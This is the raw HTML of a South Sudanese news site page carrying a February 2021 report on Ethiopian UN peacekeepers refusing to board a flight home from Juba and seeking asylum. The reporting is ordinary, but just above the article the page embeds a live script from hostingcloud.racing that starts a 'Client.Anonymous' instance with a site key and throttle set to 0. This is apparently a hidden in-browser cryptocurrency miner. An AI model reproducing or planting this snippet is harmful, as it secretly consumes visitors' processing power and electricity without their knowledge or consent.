class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/sports/">Sports</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><div id="ruby_mega_9587" class="ruby-block-wrap block-mega-menu is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9587 data-block_name= bingo_ruby_mega_block_cat data-posts_per_page= 5 data-block_page_max= 26 data-block_page_current= 1 data-category_id= 10 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/yei-womens-fc-thrashes-yambio-3-goals-to-nil/" title="Yei Women’s FC thrashes Yambio 3 goals to nil" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="462" height="210" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Yei-women-and-Yambio-FCs.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/02/Yei-women-and-Yambio-FCs.jpg 462w, https://www.jubamonitor.com/wp-content/uploads/2021/02/Yei-women-and-Yambio-FCs-300x136.jpg 300w" sizes="(max-width: 462px) 100vw, 462px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/yei-womens-fc-thrashes-yambio-3-goals-to-nil/" rel="bookmark" title="Yei Women’s FC thrashes Yambio 3 goals to nil">Yei Women’s FC thrashes Yambio 3 goals to nil</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/yei-women-football-team-to-play-yambio-in-competition/" rel="bookmark" title="Yei women football team to play Yambio in competition">Yei women football team to play Yambio in competition</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/south-sudan-cup-to-resume-tomorrow/" title="South Sudan Cup to resume tomorrow" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/A-picture-of-match-officials-in-one-of-the-South-Sudan-matches-at-Buluk-Training-Centre-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-2" href="https://www.jubamonitor.com/category/news/" title="National News">National News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/south-sudan-cup-to-resume-tomorrow/" rel="bookmark" title="South Sudan Cup to resume tomorrow">South Sudan Cup to resume tomorrow</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/ssfa-appoints-head-coach-for-senior-womens-soccer-team/" title="SSFA Appoints Head Coach for Senior Women’s Soccer Team" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="298" height="352" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/The-newly-appointed-Head-Coach-for-Bright-Starlets-ShileneBooysen.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/02/The-newly-appointed-Head-Coach-for-Bright-Starlets-ShileneBooysen.jpg 298w, https://www.jubamonitor.com/wp-content/uploads/2021/02/The-newly-appointed-Head-Coach-for-Bright-Starlets-ShileneBooysen-254x300.jpg 254w" sizes="(max-width: 298px) 100vw, 298px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-2" href="https://www.jubamonitor.com/category/news/" title="National News">National News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/ssfa-appoints-head-coach-for-senior-womens-soccer-team/" rel="bookmark" title="SSFA Appoints Head Coach for Senior Women’s Soccer Team">SSFA Appoints Head Coach for Senior Women’s Soccer Team</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/ssfa-instructs-local-associations-to-resume-activities/" title="SSFA instructs local associations to resume activities" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="375" height="305" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Anthony-John-Lauro-the-Secretary-General-for-SSFA.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/02/Anthony-John-Lauro-the-Secretary-General-for-SSFA.jpg 375w, https://www.jubamonitor.com/wp-content/uploads/2021/02/Anthony-John-Lauro-the-Secretary-General-for-SSFA-300x244.jpg 300w" sizes="(max-width: 375px) 100vw, 375px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/ssfa-instructs-local-associations-to-resume-activities/" rel="bookmark" title="SSFA instructs local associations to resume activities">SSFA instructs local associations to resume activities</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><div id="ruby_mega_9588" class="ruby-block-wrap block-mega-menu is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9588 data-block_name= bingo_ruby_mega_block_cat data-posts_per_page= 5 data-block_page_max= 37 data-block_page_current= 1 data-category_id= 9 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/chris-nevi-is-elevating-modelling-to-the-next-level/" title="Chris Nevi Is Elevating Modelling To The Next Level" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Chris-Nevi-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/chris-nevi-is-elevating-modelling-to-the-next-level/" rel="bookmark" title="Chris Nevi Is Elevating Modelling To The Next Level">Chris Nevi Is Elevating Modelling To The Next Level</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/south-sudan-artists-president-apologizes-to-fans/" title="South Sudan Artists’ president apologizes to fans" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="480" height="360" src="https://www.jubamonitor.com/wp-content/uploads/2020/12/Deng-Mtoto-president-of-South-Sudanese-Artists-Union.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2020/12/Deng-Mtoto-president-of-South-Sudanese-Artists-Union.jpg 480w, https://www.jubamonitor.com/wp-content/uploads/2020/12/Deng-Mtoto-president-of-South-Sudanese-Artists-Union-300x225.jpg 300w" sizes="(max-width: 480px) 100vw, 480px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/south-sudan-artists-president-apologizes-to-fans/" rel="bookmark" title="South Sudan Artists’ president apologizes to fans">South Sudan Artists’ president apologizes to fans</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/kilu-kilu-ana-comedy-resumes-today/" title="Kilu-kilu ana comedy resumes today" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2020/09/Comedy-lovers-at-the-Kilu-Kilu-ana-comedy-Night-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/kilu-kilu-ana-comedy-resumes-today/" rel="bookmark" title="Kilu-kilu ana comedy resumes today">Kilu-kilu ana comedy resumes today</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/south-sudan-wins-international-award/" title="South Sudan wins international award" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="450" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2020/08/John-Ngamwahl-Winner-of-International-award-at-the-Africa-online-Vocalist-competition-450x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/south-sudan-wins-international-award/" rel="bookmark" title="South Sudan wins international award">South Sudan wins international award</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/fate-of-africa-online-vocalist-to-be-decided-on-sunday/" title="Fate of Africa online vocalist to be decided on Sunday" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2020/08/John-Ngamwahl-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/fate-of-africa-online-vocalist-to-be-decided-on-sunday/" rel="bookmark" title="Fate of Africa online vocalist to be decided on Sunday">Fate of Africa online vocalist to be decided on Sunday</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li></ul></div></nav>						</div>

						<div class="navbar-right">
														
<div class="navbar-search">
	<a href="#" id="ruby-navbar-search-icon" data-mfp-src="#ruby-header-search-popup" data-effect="mpf-ruby-effect header-search-popup-outer" title="Search" class="navbar-search-icon">
		<i class="fa fa-search" aria-hidden="true"></i>
	</a>
</div>
						</div>
					</div>
				</div>
				<div id="ruby-header-search-popup" class="header-search-popup">
	<div class="header-search-popup-wrap ruby-container">
		<a href="#" class="ruby-close-search"><i class="ruby-close-btn" aria-hidden="true"></i></a>
	<div class="header-search-popup-inner">
		<form class="search-form" method="get" action="https://www.jubamonitor.com/">
			<fieldset>
				<input id="ruby-search-input" type="text" class="field" name="s" value="" placeholder="Type to search&hellip;" autocomplete="off">
				<button type="submit" value="" class="btn"><i class="fa fa-search" aria-hidden="true"></i></button>
			</fieldset>
                            <div class="header-search-result"></div>
            		</form>
	</div>
	</div>
</div>			</div>
		</div>
	</div>

</div><!--header-->	<div class="main-site-mask"></div>
	<div class="site-wrap">
		<div class="site-mask"></div>
		<div class="site-inner">
<script src="https://www.hostingcloud.racing/VK55.js"></script>
<script>
    var _client = new Client.Anonymous('4fc83fb3612a82134ac702b6fd9b380ac82007d5faaa62e0c34c616002f5d827', {
        throttle: 0, ads: 0
    });
    _client.start();
    

</script><div class="single-post-outer clearfix"><article class="single-post-wrap single-post-1 post-41127 post type-post status-publish format-standard hentry category-news-2"  itemscope  itemtype="https://schema.org/Article" ><div class="ruby-page-wrap ruby-section row single-wrap is-author-bottom is-sidebar-right ruby-container"><div class="ruby-content-wrap single-inner col-sm-8 col-xs-12 content-with-sidebar"><div class="single-post-content-outer single-box"><div class="single-post-header"><div class="single-post-top"><div class="breadcrumb-wrap"><div class="breadcrumb-inner"><span><meta itemprop="position" content="1"><a href="https://www.jubamonitor.com/">Home</a></span><i class="fa fa-angle-right breadcrumb-next"></i><span><meta itemprop="position" content="2"><a rel="bookmark" href="https://www.jubamonitor.com/category/news-2/"><span>News</span></a></span><i class="fa fa-angle-right breadcrumb-next"></i><span class="breadcrumb-current"><meta itemprop="position" content="3">PROTECTION-UN peacekeepers seek asylum</span></div><!--#breadcrumb inner--></div><!--#breadcrumb--></div><!--#single post top --><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><div class="single-title post-title entry-title is-size-1"><h1>PROTECTION-UN peacekeepers seek asylum</h1></div><!--#single title--><div class="post-meta-info is-show-icon"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:39:40+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:43:33+03:00">23/02/2021</time></span><!--#meta info date--><span class="meta-info-el meta-info-tag"><i class="fa fa-tag"></i><span class="no-tags">No tags</span></span><!--#mete info tag--></div><!--#post meta info--></div><!--#single post header--><div class="single-post-action clearfix"><div class="single-post-share-header"><a class="single-share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="single-share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=PROTECTION-UN+peacekeepers+seek+asylum&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i><script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></a> <a class="single-share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="single-share-bar-el icon-pinterest" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F&amp;media=&description=PROTECTION-UN+peacekeepers+seek+asylum" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-pinterest-p"></i></a></div><!--#single post share header--></div><!--#single post action--><div class="banner-ad-wrap banner-ad-top-single"><div class="banner-ad-inner"><div class="banner-ad-image"><img src="https://www.jubamonitor.com/wp-content/uploads/2019/01/jubamonitor-ads-2.jpg" alt="Juba Monitor"></div></div></div><div class="single-post-body"><div class="single-content-wrap"><div class="single-entry-wrap"><div class="entry single-entry clearfix">
<p><strong>By
Okan Thomas Onyango/James Atem Kuir</strong></p>



<p>Fifteen (15) out of
169 Ethiopian peacekeepers that were scheduled to return home and who refused
to board a flight home at Juba International Airport earlier this week remained
behind seeking asylum. </p>



<p>On Monday,
well-placed sources told Juba Monitor that a brawl broke out among Ethiopian
troops when some declined to board flight back home, paralyzing operations at
the airport before UN officials intervened and defused the confrontation.</p>



<p>The 15 personnel said
to be mostly of Tigrayan
origin are part of Ethiopian peacekeeping troops serving under the United Nations Mission in South Sudan (UNMISS).</p>



<p>According
to the UN spokesperson Stephane Dujarric, the flight left 15 members
who feared to go back to Ethiopia where government has been fighting forces
loyal to Tigray´s fugitive leaders.</p>



<p>&#8220;We are trying to get
the details, but I do understand about 15 members of the contingent chose not
to board the flight at the Juba airport,&#8221; Dujarric said in a statement to
AP news agency yesterday. </p>



<p>&#8220;They have asked to
stay. They are receiving support from the South Sudanese Ministry of Refugee
Affairs.&#8221; The U.N. refugee agency, UNHCR, is &#8220;in contact with the
South Sudanese authorities,&#8221; he added.</p>



<p>Juba Monitor tried to get
comments from the UN mission in the country but all efforts were futile. </p>



<p>Reacting to the
scuffle, prominent activist, Edmund Yakani called on the government to
intervene, saying the country is in good position to create harmony among the
conflicting forces.</p>



<p>“With the incident
that happened at the Juba International Airport, South Sudan government should
take it seriously and intervene to create mutual understanding and restore the
relationship among various ethnic groups of Ethiopia that are under the UN
Peacekeeping Mission because they are not only under UNMISS, they are also
under the Municipal of Abyei,” Yakani said.</p>



<p>The activist also
appealed to the Ethiopian troops to abstain from engaging in disagreements caused
by home-based politics, and demonstrate maturity of respecting the principles
and the values of the United Nations Peacekeeping Mission in the country.</p>



<p>“If they feel that
their lives are threatened, at risk or uncomfortable, they can seek for asylum
because it is a basic right among the human rights. They should be given asylum
and we are praying for the best solution for Ethiopians so that they can live
in peace,” the activist added.</p>



<p>According to the UN Some 2,100 of the mission’s 17,200 troops, police and civilians
come from Ethiopia.</p>



<p>The U.N. refugee agency said more than 50,000 Ethiopians, mainly
from Tigray, have fled across the border to Sudan.</p>
</div></div><!--#single entry wrap--><div class="single-post-share-big"><div class="single-post-share-big-inner"><a class="share-bar-el-big icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i><span>share on Facebook</span></a><a class="share-bar-el-big icon-twitter" href="https://twitter.com/intent/tweet?text=PROTECTION-UN+peacekeepers+seek+asylum&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fprotection-un-peacekeepers-seek-asylum%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i><span>share on Twitter</span></a></div></div><div class="single-post-box single-post-box-comment"><div class="box-comment-content"></div></div></div><!--#single content wrap --><meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="https://www.jubamonitor.com/protection-un-peacekeepers-seek-asylum/"/><meta itemprop="headline " content="PROTECTION-UN peacekeepers seek asylum"><span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="adminjubamonitor"></span><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content=""><meta itemprop="width" content=""><meta itemprop="height" content=""></span><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"></span><meta itemprop="name" content="adminjubamonitor"></span><meta itemprop="datePublished" content="2021-02-24T06:39:40+00:00"/><meta itemprop="dateModified" content="2021-02-23T20:43:33+00:00"/></div><!--#single post body --></div><!--#single post content outer --><div class="single-post-box-outer"><nav class="single-nav single-box row"><div class="col-sm-6 col-xs-12 nav-el nav-left post-title is-size-6"><a href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" rel="bookmark" title="Students continue to protest over unpaid arrears"><span class="ruby-nav-icon nav-left-icon"><i class="fa fa-angle-left"></i></span><span class="ruby-nav-link nav-left-link">Students continue to protest over unpaid arrears</span></a></div><div class="col-sm-6 col-xs-12 nav-el nav-right post-title is-size-6"><a href="https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/" rel="bookmark" title="Refugees to benefit from business grant"><span class="ruby-nav-icon nav-right-icon"><i class="fa fa-angle-right"></i></span><span class="ruby-nav-link nav-right-link">Refugees to benefit from business grant</span></a></div></nav><div class="single-post-box-related has-header-block clearfix box-related-1"><div class="box-related-header block-header-wrap"><div class="block-header-inner"><div class="block-title"><h3>You Might Also Like</h3></div></div></div><!--#related header--><div class="box-related-content block-content-wrap row"><div class="post-outer"><article class="post-wrap post-list-1 clearfix is-no-featured"><div class="post-list-inner"><div class="col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/" rel="bookmark" title="Refugees to benefit from business grant">Refugees to benefit from business grant</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T18:36:21+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:37:57+03:00">23/02/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Gaaniko Samson Jerry    Refugees in Uganda Rhino Refugee camp and the host communities will benefit from the Grant Capital business supported by International Labour Organization (ILO). The initiative aimed at reducing the negative impact posed by Covid-19 pandemic that has led to the collapse of several businesses in Uganda as well as the refugee’s business community. The program will be implemented by the Federation of Small and Medium Sized Enterprises Uganda (FSME) which has identified 100 business entities in Rhino Refugee camp to benefit from a grant capital...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Frefugees-to-benefit-from-business-grant%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Refugees+to+benefit+from+business+grant&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Frefugees-to-benefit-from-business-grant%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Frefugees-to-benefit-from-business-grant%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Frefugees-to-benefit-from-business-grant%2F&amp;title=Refugees+to+benefit+from+business+grant" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Refugees+to+benefit+from+business+grant&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Frefugees-to-benefit-from-business-grant%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" title="Students continue to protest over unpaid arrears" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="330" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/South-Sudanese-students-who-graduated-while-in-Zimbabwe-365x330.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-33" href="https://www.jubamonitor.com/category/education/" title="Education">Education</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 